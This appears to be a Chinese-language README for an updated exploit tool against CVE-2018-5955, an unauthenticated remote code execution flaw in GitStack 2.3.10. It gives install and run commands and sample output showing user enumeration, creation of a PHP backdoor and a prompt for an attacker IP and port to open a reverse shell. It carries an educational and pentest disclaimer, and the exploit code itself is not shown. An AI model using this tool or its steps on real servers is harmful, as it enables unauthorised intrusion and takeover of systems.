CVE 2018 5955
1.0.0
CVE-2018-5955 GITSTACK 2.3.10未經身份驗證的RCE的利用
利用:Gitstack 2.3.10未經驗證的遠程代碼執行
日期:2018年1月18日
軟件鏈接:https://gitstack.com/
漏洞作者:kacper szurek
原始利用:https://www.exploit-db.com/exploits/43777
網站:https://security.szurek.pl/
類別:遠程
CVE:CVE-2018-5955
日期:23.06.2023
新功能:Interactive RCE,OS檢測,反向外殼功能,從Python2改編為Python33
CVE:CVE-2018-5955
類別:遠程
我對您的行為不承擔任何責任,因為我將其發佈在GitHub上以進行教育目的或經過認證和授權的滲透測試
安裝要求:
pip install colorama
然後,您可以運行它:
python3 exploit.py
在您利用CVE之後將檢測到操作系統,實際上將有此輸出線:“ [*] OS:$ operatatingsystem”(下面的Dimostration)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
您還可以鍵入“ OS”以找出哪種類型的操作系統是
要在目標上獲取實際的反向外殼,您可以輸入“ shell”,然後輸入IP,然後以這樣的方式鍵入您的收聽端口:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE